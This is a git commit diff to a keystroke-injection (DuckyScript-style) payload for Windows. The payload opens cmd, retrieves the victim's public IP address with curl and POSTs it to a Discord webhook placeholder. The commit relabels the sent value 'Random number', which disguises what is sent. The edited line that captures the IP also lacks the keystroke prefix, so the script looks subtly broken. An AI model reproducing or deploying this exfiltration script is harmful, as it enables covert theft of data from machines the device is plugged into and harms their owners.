update ip discord webhook thing to use variables
This commit is contained in:
parent
b124549e75
commit
bdbc8e544e
1 changed files with 6 additions and 6 deletions
|
@ -1,15 +1,15 @@
|
||||||
REM replace "YOUR_DISCORD_WEBHOOK_URL" in line 13 to your own discord webhook. to be run on windows systems.
|
REM to be run on windows systems. replace "YOUR_DISCORD_WEBHOOK_URL" in line 13 to your own discord webhook.
|
||||||
DELAY 1000
|
DELAY 500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING cmd
|
STRING cmd
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
DELAY 500
|
||||||
STRING curl ipv4.icanhazip.com > temp.txt
|
for /f "delims=" %i in ('curl ipv4.icanhazip.com') do set IP_ADDR=%i
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING set /p IP=<temp.txt & curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Current IP Address: %IP%\"}" YOUR_DISCORD_WEBHOOK_URL
|
STRING curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Random number: %IP_ADDR%\"}" YOUR_DISCORD_WEBHOOK_URL
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
Loading…
Add table
Reference in a new issue